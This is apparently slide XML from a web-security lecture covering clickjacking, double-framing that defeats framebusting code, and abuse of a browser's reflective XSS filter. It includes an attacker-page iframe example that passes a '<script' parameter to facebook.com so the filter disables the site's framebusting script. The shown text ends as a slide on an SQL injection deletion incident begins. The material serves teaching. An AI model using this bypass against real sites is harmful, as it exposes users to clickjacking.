            </a:pPr>
            <a:r>
              <a:rPr sz="2200" spc="-10" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Outer</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="-10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200" spc="-10" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>iframe</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="-8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(page2.html)</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="-3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host</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="-10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the</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="-7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inner</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="-10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iframe:</a:t>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:latin typeface="Constantia"/>
              <a:cs typeface="Constantia"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="533400" lvl="1" indent="-210185">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="265"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="0BD0D9"/>
              </a:buClr>
              <a:buSzPct val="64285"/>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
              <a:tabLst>
                <a:tab pos="534035" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="2100" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>&lt;iframe</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2100" spc="-90" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2100" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>src=“page1.html"&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="2100">
              <a:latin typeface="Constantia"/>
              <a:cs typeface="Constantia"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"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3000">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="259079" marR="127000" indent="-246379">
              <a:lnSpc>
                <a:spcPts val="2380"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="009DD9"/>
              </a:buClr>
              <a:buSzPct val="70454"/>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
              <a:tabLst>
                <a:tab pos="259715" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="2200" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>When</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="-70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framebusting</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="-85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code</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="-125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wants</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="-90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to</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="-125" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="-20" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>access</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="-90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the</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="-90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top</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="-105" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="-20" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>page</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="-75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location  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="-10" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>parent.location </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>of </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="-10" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>page1.html</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>), </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>the </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="-15" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>code</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="-30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fails</a:t>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:latin typeface="Constantia"/>
              <a:cs typeface="Constantia"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="259079" marR="5080" indent="-246379">
              <a:lnSpc>
                <a:spcPts val="2380"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="520"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="009DD9"/>
              </a:buClr>
              <a:buSzPct val="70454"/>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
              <a:tabLst>
                <a:tab pos="259715" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="2200" spc="-15" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Browser</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="-13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prohibits</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="-125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accessing</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="-50" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>the</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="-10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200" spc="-10" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>parent</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="-13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200" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>of</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="-1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200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>a</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="-9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200" spc="-10" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>parent</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="-13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of </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>a</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="-125" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="-20" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>web</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="-95" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="-20" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>page  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>loaded in </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>an</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="-17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iframe</a:t>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:latin typeface="Constantia"/>
              <a:cs typeface="Constantia"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="259079" marR="828675" indent="-246379">
              <a:lnSpc>
                <a:spcPts val="2380"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="520"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="009DD9"/>
              </a:buClr>
              <a:buSzPct val="70454"/>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
              <a:tabLst>
                <a:tab pos="259715" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="2200" spc="-20" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Browser’s</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="-7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built‐in</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="-95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security</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="-100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policy</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="-90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thwarts</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="-114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combatting</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="-4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the  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>clickjacking</a:t>
            </a:r>
            <a:endParaRPr sz="2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640077" y="716534"/>
            <a:ext cx="7085965" cy="635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35" dirty="0"/>
              <a:t>Attack </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4000" spc="-5" dirty="0"/>
              <a:t>type: </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4000" spc="-15" dirty="0"/>
              <a:t>reflective </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4000" spc="-20" dirty="0"/>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4000" spc="-55" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4000" spc="-10" dirty="0"/>
              <a:t>filtering</a:t>
            </a:r>
            <a:endParaRPr sz="4000"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69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1032763" y="1470367"/>
            <a:ext cx="7849870" cy="2377440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259079" indent="-246379">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="375"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="009DD9"/>
              </a:buClr>
              <a:buSzPct val="70454"/>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
              <a:tabLst>
                <a:tab pos="259715" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="2200" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t> filters</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="-105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protect</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="-135" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="-20" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>web</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="-100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pages</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="-8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from</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="-114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certain</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="-7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types</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="-12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of</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="220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XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="-50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attacks</a:t>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:latin typeface="Constantia"/>
              <a:cs typeface="Constantia"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="533400" marR="5080" lvl="1" indent="-210185">
              <a:lnSpc>
                <a:spcPts val="2270"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="545"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="0BD0D9"/>
              </a:buClr>
              <a:buSzPct val="64285"/>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
              <a:tabLst>
                <a:tab pos="534035" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="2100" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>http://www.....?&lt;script&gt;.....&lt;/script&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2100" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>pattern from </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2100" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>address</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2100" spc="-325" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2100" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>typed  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2100" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>in </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2100" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>the </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2100" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>address</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2100" spc="-229" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2100" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>bar</a:t>
            </a:r>
            <a:endParaRPr sz="2100">
              <a:latin typeface="Constantia"/>
              <a:cs typeface="Constantia"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="25"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="0BD0D9"/>
              </a:buClr>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:endParaRPr sz="2950">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="259079" marR="351155" indent="-246379" algn="just">
              <a:lnSpc>
                <a:spcPts val="2380"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="009DD9"/>
              </a:buClr>
              <a:buSzPct val="70454"/>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
              <a:tabLst>
                <a:tab pos="259715" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="2200" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>By</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="-5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matching</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="-35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the</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="-8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beginning</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="-75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of</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="-15" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t> any</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="-120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script</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="-10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tag</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="-1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in</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="-6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the</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="-105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requested  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>URLs,</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="-3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the</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="-8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filter</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="-16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disables</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="-11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all</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="-2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inline</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="-114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scripts</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="-12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within</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="-70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the</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="-10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response  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="-15" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>page, </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>including </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>frame </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>busting</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="-195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scripts</a:t>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:latin typeface="Constantia"/>
              <a:cs typeface="Constantia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1441450" y="4337050"/>
          <a:ext cx="6934835" cy="22377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74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0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816610">
                        <a:lnSpc>
                          <a:spcPts val="2060"/>
                        </a:lnSpc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Location</a:t>
                      </a:r>
                      <a:endParaRPr sz="1800">
                        <a:latin typeface="Constantia"/>
                        <a:cs typeface="Constantia"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="0" marR="0" marT="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53975">
                      <a:solidFill>
                        <a:srgbClr val="FFFFFF"/>
                      </a:solidFill>
                      <a:prstDash val="solid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2060"/>
                        </a:lnSpc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Code</a:t>
                      </a:r>
                      <a:endParaRPr sz="1800">
                        <a:latin typeface="Constantia"/>
                        <a:cs typeface="Constanti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53975">
                      <a:solidFill>
                        <a:srgbClr val="FFFFFF"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnB>
                    <a:solidFill>
                      <a:srgbClr val="0F6F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1710">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="75565" marR="65405">
                        <a:lnSpc>
                          <a:spcPct val="100299"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="509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Legitimate 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web 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page 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(h</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="1800" b="1" spc="-30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t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tp://</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="1800" b="1" spc="30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ww</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="1800" b="1" spc="-175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w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.fa</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="1800" b="1" spc="-40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c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ebook. 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com)</a:t>
                      </a:r>
                      <a:endParaRPr sz="1800">
                        <a:latin typeface="Constantia"/>
                        <a:cs typeface="Constantia"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="0" marR="0" marT="64769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3975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244475" marR="1214755" indent="-169545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800" spc="-10" dirty="0">
                          <a:latin typeface="Constantia"/>
                          <a:cs typeface="Constantia"/>
                        </a:rPr>
                        <a:t>if(top.location </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="1800" dirty="0">
                          <a:latin typeface="Constantia"/>
                          <a:cs typeface="Constantia"/>
                        </a:rPr>
                        <a:t>!=</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="1800" spc="-70" dirty="0">
                          <a:latin typeface="Constantia"/>
                          <a:cs typeface="Constantia"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="1800" spc="-5" dirty="0">
                          <a:latin typeface="Constantia"/>
                          <a:cs typeface="Constantia"/>
                        </a:rPr>
                        <a:t>self.location){  </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="1800" spc="-10" dirty="0">
                          <a:latin typeface="Constantia"/>
                          <a:cs typeface="Constantia"/>
                        </a:rPr>
                        <a:t>top.location </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="1800" dirty="0">
                          <a:latin typeface="Constantia"/>
                          <a:cs typeface="Constantia"/>
                        </a:rPr>
                        <a:t>=</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="1800" spc="-75" dirty="0">
                          <a:latin typeface="Constantia"/>
                          <a:cs typeface="Constantia"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="1800" spc="-5" dirty="0">
                          <a:latin typeface="Constantia"/>
                          <a:cs typeface="Constantia"/>
                        </a:rPr>
                        <a:t>self.location;</a:t>
                      </a:r>
                      <a:endParaRPr sz="1800">
                        <a:latin typeface="Constantia"/>
                        <a:cs typeface="Constantia"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr marL="7493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800" dirty="0">
                          <a:latin typeface="Constantia"/>
                          <a:cs typeface="Constantia"/>
                        </a:rPr>
                        <a:t>}</a:t>
                      </a:r>
                      <a:endParaRPr sz="1800">
                        <a:latin typeface="Constantia"/>
                        <a:cs typeface="Constantia"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="0" marR="0" marT="654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3975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17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Attacker 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web</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="1800" b="1" spc="-180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 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page</a:t>
                      </a:r>
                      <a:endParaRPr sz="1800">
                        <a:latin typeface="Constantia"/>
                        <a:cs typeface="Constantia"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="0" marR="0" marT="4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74930" marR="96520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800" spc="-5" dirty="0">
                          <a:latin typeface="Constantia"/>
                          <a:cs typeface="Constantia"/>
                        </a:rPr>
                        <a:t>&lt;iframe  </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="1800" spc="-10" dirty="0">
                          <a:latin typeface="Constantia"/>
                          <a:cs typeface="Constantia"/>
                        </a:rPr>
                        <a:t>sr</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="1800" spc="-10" dirty="0">
                          <a:latin typeface="Constantia"/>
                          <a:cs typeface="Constantia"/>
                          <a:hlinkClick r:id="rId5"/>
                        </a:rPr>
                        <a:t>c="ht</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="1800" spc="-10" dirty="0">
                          <a:latin typeface="Constantia"/>
                          <a:cs typeface="Constantia"/>
                        </a:rPr>
                        <a:t>t</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="1800" spc="-10" dirty="0">
                          <a:latin typeface="Constantia"/>
                          <a:cs typeface="Constantia"/>
                          <a:hlinkClick r:id="rId5"/>
                        </a:rPr>
                        <a:t>p://w</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="1800" spc="-10" dirty="0">
                          <a:latin typeface="Constantia"/>
                          <a:cs typeface="Constantia"/>
                        </a:rPr>
                        <a:t>ww</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="1800" spc="-10" dirty="0">
                          <a:latin typeface="Constantia"/>
                          <a:cs typeface="Constantia"/>
                          <a:hlinkClick r:id="rId5"/>
                        </a:rPr>
                        <a:t>.facebook.com/?v=&lt;script</a:t>
                      </a:r>
                      <a:endParaRPr sz="1800">
                        <a:latin typeface="Constantia"/>
                        <a:cs typeface="Constantia"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr marL="74930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Constantia"/>
                          <a:cs typeface="Constantia"/>
                        </a:rPr>
                        <a:t>&gt;if''&gt;</a:t>
                      </a:r>
                      <a:endParaRPr sz="1800">
                        <a:latin typeface="Constantia"/>
                        <a:cs typeface="Constantia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794001" y="629665"/>
            <a:ext cx="647065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Example </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-10" dirty="0"/>
              <a:t>incident: </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-15" dirty="0"/>
              <a:t>Information</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="90" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-10" dirty="0"/>
              <a:t>deletion</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="object 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1063752" y="1362862"/>
            <a:ext cx="7473695" cy="350022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146299" y="4854202"/>
            <a:ext cx="7869555" cy="17354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spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000CC"/>
                </a:solidFill>
                <a:latin typeface="Tempus Sans ITC"/>
                <a:cs typeface="Tempus Sans ITC"/>
              </a:rPr>
              <a:t>“The existence </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000CC"/>
                </a:solidFill>
                <a:latin typeface="Tempus Sans ITC"/>
                <a:cs typeface="Tempus Sans ITC"/>
              </a:rPr>
              <a:t>of </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000CC"/>
                </a:solidFill>
                <a:latin typeface="Tempus Sans ITC"/>
                <a:cs typeface="Tempus Sans ITC"/>
              </a:rPr>
              <a:t>an </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Tempus Sans ITC"/>
                <a:cs typeface="Tempus Sans ITC"/>
              </a:rPr>
              <a:t>SQL injection attack </a:t>
            </a:r>
            <a:r>
